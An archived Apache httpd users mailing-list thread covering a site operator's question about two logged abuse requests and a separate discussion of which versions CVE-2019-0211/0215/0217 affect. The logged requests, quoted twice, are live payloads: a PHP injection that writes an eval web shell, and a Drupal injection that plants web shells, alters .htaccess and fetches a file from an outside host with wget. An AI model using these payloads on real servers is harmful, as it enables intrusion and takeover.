Strange responses

classic Classic list List threaded Threaded
8 messages Options
Reply | Threaded
Open this post in threaded view
|

Strange responses

kohmoto
Hi,

I operate my site with httpd 2.4.39 with ssl option.

Yesterday, strange responses were observed.

My site received the following abuse requests.  Except the following
requests, the httpd return 404 error to obvious abuse requets. However,
as to the following two queries, the httpd seemed to return a message
when it receives 'GET /' with 200 status.  I  expect the httpd should
return 404 error.

Case 1:
GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1

Case 2:
POST
/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
HTTP/1.1

It would be very appriciated if someone could advise me.

Thank you.

Yours truly,

Kazuhiko Kohmoto



---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|

CVE-2019-0211/0215/0217

sunhux G

Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
& other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
affected?

Can point me to where to get the patches for RHEL7/RHEL6
in Red Hat support portal or anywhere else that's reliable??

Sun
Reply | Threaded
Open this post in threaded view
|

Re: CVE-2019-0211/0215/0217

@lbutlr
On 6 Apr 2019, at 08:59, Sunhux G <[hidden email]> wrote:
> Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
> & other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
> affected?

The CVE lists, explicitly, what versions are affected.

"The flaw was discovered by Charles Fol and impacts all Apache HTTP Server releases from 2.4.17 to 2.4.38. The issue has been addressed with the release of Apache httpd 2.4.39"

Also, as you should be aware, Apache 2.0 and Apache 2.2 are both End-of-life and not supported any longer.


--
Love is like oxygen / You get too much / you get too high / Not enough
and you're gonna die


---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: CVE-2019-0211/0215/0217

sunhux G
In reply to this post by sunhux G

Also,
can we safely say CVE-2019-0217 & CVE-2019-0215 affects "2.4.17 through 2.4.38 with MPM event, worker or prefork" only (just like CVE-2019-0211)?

How do I check if we have "MPM event, worker or prefork" in our Apache?


On Sat, Apr 6, 2019 at 10:59 PM Sunhux G <[hidden email]> wrote:

Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
& other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
affected?

Can point me to where to get the patches for RHEL7/RHEL6
in Red Hat support portal or anywhere else that's reliable??

Sun
Reply | Threaded
Open this post in threaded view
|

Re: CVE-2019-0211/0215/0217

Dan Ehrlich-2
I’ve seen a few CVEs now that are low level but pretty much effect every version from 2.4.30ish and back. 

The default Apache versions in the Debian and Ubuntu repos are 2.4.25 and 2.4.29 respectively.

QUESTIONS:
1. Anyway to move the versions up (assuming I didn’t miss something) ?
2. Happy to help / take on task if someone can point me in the right direction 


On Apr 6, 2019, at 11:14 PM, Sunhux G <[hidden email]> wrote:

Also,
can we safely say CVE-2019-0217 & CVE-2019-0215 affects "2.4.17 through 2.4.38 with MPM event, worker or prefork" only (just like CVE-2019-0211)?

How do I check if we have "MPM event, worker or prefork" in our Apache?


On Sat, Apr 6, 2019 at 10:59 PM Sunhux G <[hidden email]> wrote:

Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
& other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
affected?

Can point me to where to get the patches for RHEL7/RHEL6
in Red Hat support portal or anywhere else that's reliable??

Sun
Reply | Threaded
Open this post in threaded view
|

Re: CVE-2019-0211/0215/0217

Yehuda Katz
The distributions like RedHat, Debian, Ubuntu, etc. lock the version of their software packages when they release any specific version of their OS and they are responsible to backport any security or bug fixes.

For example, you can see Debian's tracker here:  https://security-tracker.debian.org/tracker/CVE-2019-0211
They append their own release number to the end of the HTTPD version to show that they fixed the bug (2.4.25-3+deb9u6 to deb9u7).
Ubuntu says they fixed the issues in 2.4.29-1ubuntu4.6

- Y

On Sun, Apr 7, 2019 at 3:43 AM Dan Ehrlich <[hidden email]> wrote:
I’ve seen a few CVEs now that are low level but pretty much effect every version from 2.4.30ish and back. 

The default Apache versions in the Debian and Ubuntu repos are 2.4.25 and 2.4.29 respectively.

QUESTIONS:
1. Anyway to move the versions up (assuming I didn’t miss something) ?
2. Happy to help / take on task if someone can point me in the right direction 


On Apr 6, 2019, at 11:14 PM, Sunhux G <[hidden email]> wrote:

Also,
can we safely say CVE-2019-0217 & CVE-2019-0215 affects "2.4.17 through 2.4.38 with MPM event, worker or prefork" only (just like CVE-2019-0211)?

How do I check if we have "MPM event, worker or prefork" in our Apache?


On Sat, Apr 6, 2019 at 10:59 PM Sunhux G <[hidden email]> wrote:

Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
& other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
affected?

Can point me to where to get the patches for RHEL7/RHEL6
in Red Hat support portal or anywhere else that's reliable??

Sun
Reply | Threaded
Open this post in threaded view
|

Re: Strange responses

William A Rowe Jr
In reply to this post by kohmoto
The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'? Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?' query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto <[hidden email]> wrote:
Hi,

I operate my site with httpd 2.4.39 with ssl option.

Yesterday, strange responses were observed.

My site received the following abuse requests.  Except the following
requests, the httpd return 404 error to obvious abuse requets. However,
as to the following two queries, the httpd seemed to return a message
when it receives 'GET /' with 200 status.  I  expect the httpd should
return 404 error.

Case 1:
GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1

Case 2:
POST
/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
HTTP/1.1

It would be very appriciated if someone could advise me.

Thank you.

Yours truly,

Kazuhiko Kohmoto



---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: CVE-2019-0211/0215/0217

William A Rowe Jr
In reply to this post by @lbutlr
In general, problems which stretch back to the initial 2.4.1 or commonly deployed 2.4.3 might also affect 2.2.x or 2.0.x. As users have had almost a decade to adjust and these versions are EOL, the project seems unlikely to care, and notices are everywhere that the old flavors are no longer evaluated for the impact of any defects, security or otherwise. Vendors who support older flavors are on their own to make such evaluations themselves.

And in general, when a later, specific flavor of 2.4.x (e.g. 2.4.17) is cited as the first version impacted, that version is expected to be the one where a defect was introduced.

There is the edge case that a problem could exist, then be fixed or masked sometime before 2.4.1, and later be reintroduced during 2.4.x, but the rules above should generally apply. 

On Sun, Apr 7, 2019, 02:38 @lbutlr <[hidden email]> wrote:
On 6 Apr 2019, at 08:59, Sunhux G <[hidden email]> wrote:
> Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
> & other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
> affected?

The CVE lists, explicitly, what versions are affected.

"The flaw was discovered by Charles Fol and impacts all Apache HTTP Server releases from 2.4.17 to 2.4.38. The issue has been addressed with the release of Apache httpd 2.4.39"

Also, as you should be aware, Apache 2.0 and Apache 2.2 are both End-of-life and not supported any longer.


--
Love is like oxygen / You get too much / you get too high / Not enough
and you're gonna die


---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]